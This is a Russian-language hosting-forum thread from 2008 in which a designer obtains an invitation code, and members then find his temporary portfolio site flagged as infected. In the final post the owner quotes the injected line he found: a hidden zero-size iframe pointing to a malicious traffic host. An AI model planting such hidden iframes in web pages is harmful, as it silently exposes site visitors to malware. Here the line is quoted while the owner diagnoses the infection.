EOMY.NET
Хостинг EOMY.NET: Форум поддержки
 
 FAQFAQ   ПоискПоиск   ПользователиПользователи   ГруппыГруппы   РегистрацияРегистрация 
 ПрофильПрофиль   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 
RSS Feed  

[Код выслан] Портфолио дизайнера (полиграфия)
На страницу 1, 2  След.
 
Начать новую тему   Ответить на тему    Список форумов EOMY.NET -> Выдача пригласительных кодов
[Код выслан] Портфолио дизайнера (полиграфия)
Автор Сообщение
Eric



Зарегистрирован: 17.01.2008
Сообщения: 16
Откуда: Roma
1004 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 14:34    Заголовок сообщения: [Код выслан] Портфолио дизайнера (полиграфия) Ответить с цитатой

Портфолио дизайнера (полиграфия).
Сайт располагался на хостинге который по непонятным причинам закрылся.
Сейчас сайт временно расположен по адресу http://spilix.110mb.com
К сожалению ссылки на сами работы привязаны к конкретному домену, по этому они не хотят отображаться Sad
Т.к. работ в портфолио много, нужно много править вручную в txtSQL (сайт БД не использует) - думаю что намного проще поселиться на хорошем, надежном хостинге и прикрутить обратно домен на который смотрят картинки работ.

Надеюсь, кто-нибудь меня поймет и поможет приглашением.
Заранее всем спасибо.


Добавлено администратором:
Зарегистрирован сайт http://eric.fsay.net

_________________
WBR, Eric
Design&PrePress
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Roma-i-alena
11 1110 1000
11 1110 1000


Зарегистрирован: 03.05.2007
Сообщения: 1133
Откуда: vladimir
6191 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 15:06    Заголовок сообщения: Ответить с цитатой

Не дурно!

Коди высылаю в ЛС.

Удачи!
_________________
Жизнь никогда не заканчивается!!!
На то, собственно говоря, она и ЖИЗНЬ...
____________________________________
http://www.coderun.ru - Блог человека
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
Eric



Зарегистрирован: 17.01.2008
Сообщения: 16
Откуда: Roma
1004 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 15:08    Заголовок сообщения: Ответить с цитатой

Огромное преогромное спасибо!
Никак не ожидал так быстро!
_________________
WBR, Eric
Design&PrePress
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Roma-i-alena
11 1110 1000
11 1110 1000


Зарегистрирован: 03.05.2007
Сообщения: 1133
Откуда: vladimir
6191 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 15:27    Заголовок сообщения: Ответить с цитатой

Цитата:
Никак не ожидал так быстро!


Ну так на EOMY.NET всегда так!!!! Laughing Laughing Laughing Laughing

Привыкайте к хорошему!
_________________
Жизнь никогда не заканчивается!!!
На то, собственно говоря, она и ЖИЗНЬ...
____________________________________
http://www.coderun.ru - Блог человека
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
Subba
Хостинг — это наше всё!
Хостинг — это наше всё!


Зарегистрирован: 04.06.2007
Сообщения: 289

2920 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 15:29    Заголовок сообщения: Ответить с цитатой

ууу... зачем код выслали там, если я не ошибаюсь вирус -
Цитата:
The requested URL http://spilix.110mb.com/ is infected with Trojan-Downloader.HTML.IFrame.dq virus
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Eric



Зарегистрирован: 17.01.2008
Сообщения: 16
Откуда: Roma
1004 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 15:47    Заголовок сообщения: Ответить с цитатой

Где вирус? Вы че?
Это хостер какой-то англ... Временный... Вроде ничего плохого не говорили про него
_________________
WBR, Eric
Design&PrePress
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Eric



Зарегистрирован: 17.01.2008
Сообщения: 16
Откуда: Roma
1004 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 15:47    Заголовок сообщения: Ответить с цитатой

Хостер 110mb.com зачем ему быть вирусом? Это у вас ошибка какаято...
_________________
WBR, Eric
Design&PrePress
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Eric



Зарегистрирован: 17.01.2008
Сообщения: 16
Откуда: Roma
1004 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 15:50    Заголовок сообщения: Ответить с цитатой

Вдобавок там какой-то IFrame у вас значиться, а я такого не использую в коде нигде...
Если это правда про троян - то думаю может это так называемая "без рекламная" хостинговая компания... Потому как по условиям они рекламу не вешают... гм... вообще странно
_________________
WBR, Eric
Design&PrePress
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Roma-i-alena
11 1110 1000
11 1110 1000


Зарегистрирован: 03.05.2007
Сообщения: 1133
Откуда: vladimir
6191 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 17:34    Заголовок сообщения: Ответить с цитатой

Никакого вируса я там не заметил. Может пропустил???
_________________
Жизнь никогда не заканчивается!!!
На то, собственно говоря, она и ЖИЗНЬ...
____________________________________
http://www.coderun.ru - Блог человека
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
[LP]LordPro.teus
Призрак Лорда
Призрак Лорда


Зарегистрирован: 26.07.2007
Сообщения: 5092

42282 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 17:43    Заголовок сообщения: Ответить с цитатой

У меня тоже ничего не обнаружено... в то время, как мой антивир таковые на сайтах без проблем обнаруживает... думаю, ложная тревога
_________________

До выхода LiteDiary 0.3.0: парам-пам-пам-пам! Она уже здесь!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Eric



Зарегистрирован: 17.01.2008
Сообщения: 16
Откуда: Roma
1004 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 17:49    Заголовок сообщения: Ответить с цитатой

Спасибо, успокоили... Я уже переживать стал, что код отберут Shocked
_________________
WBR, Eric
Design&PrePress
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Roma-i-alena
11 1110 1000
11 1110 1000


Зарегистрирован: 03.05.2007
Сообщения: 1133
Откуда: vladimir
6191 Монеты

СообщениеДобавлено: Чт, 17 Янв, 2008 18:47    Заголовок сообщения: Ответить с цитатой

Я уже переживать стал, что код отберут Laughing

Это тебе не Дама-пик где сначала дают, а потом отбирают, так что радуйся такому хостингу.
_________________
Жизнь никогда не заканчивается!!!
На то, собственно говоря, она и ЖИЗНЬ...
____________________________________
http://www.coderun.ru - Блог человека
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
Eric



Зарегистрирован: 17.01.2008
Сообщения: 16
Откуда: Roma
1004 Монеты

СообщениеДобавлено: Пт, 18 Янв, 2008 00:15    Заголовок сообщения: Ответить с цитатой

Все, всем спасибо еще раз.
Вроде как начал работать по домену http://eric.in.ua
Потихоньку НСы расходяцца по миру...
Когда http://eric.org.ua разойдется то и картинки все подгрузяцца.
А так все работает, всем доволен.

П.С. Напишите там в заголовке мессаги типа [ Код выслан ] или типа того Smile
_________________
WBR, Eric
Design&PrePress
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Roma-i-alena
11 1110 1000
11 1110 1000


Зарегистрирован: 03.05.2007
Сообщения: 1133
Откуда: vladimir
6191 Монеты

СообщениеДобавлено: Пт, 18 Янв, 2008 04:57    Заголовок сообщения: Ответить с цитатой

Прикол! Сменил антивирь на каспера 7 и он нашёл в кеше браузера вирусы от вашего сайта, тот троян которые IFRAME. Не уверен, что это вирус, но стоит повнимательнее посмотреть что там у вас
_________________
Жизнь никогда не заканчивается!!!
На то, собственно говоря, она и ЖИЗНЬ...
____________________________________
http://www.coderun.ru - Блог человека
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
Eric



Зарегистрирован: 17.01.2008
Сообщения: 16
Откуда: Roma
1004 Монеты

СообщениеДобавлено: Пт, 18 Янв, 2008 07:47    Заголовок сообщения: Ответить с цитатой

Да действительно, прошу прощения всех, но там был зараженый код, я сам только разобрался....
Каким то образом обнаружил чужие строки в коде... В конце главного файла дописаны были...

Код:
<!-- ~ --><iframe src="http://orentraff.cn/tds/index.php?out=1191410716" width="0" height="0" style="display:none"></iframe><!-- ~ -->


Это точно не мое... Я нашел это только на копии сайта который на 110мв.ком, на локальной версии и на то что у другого хостера было - все чисто.. Sad

Вот нашел а инете еще жалобы на эту фигню http://donchenko.blogspot.com/2007/11/orentraffcn.html
_________________
WBR, Eric
Design&PrePress
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Показать сообщения:   
Начать новую тему   Ответить на тему    Список форумов EOMY.NET -> Выдача пригласительных кодов Часовой пояс: GMT
На страницу 1, 2  След.
Страница 1 из 2

 


EOMY TOP 100 Rambler's Top100   Рейтинг@Mail.ru    



Powered by phpBB © 2001, 2005 phpBB Group


Рейтинг SIMPLETOP.NET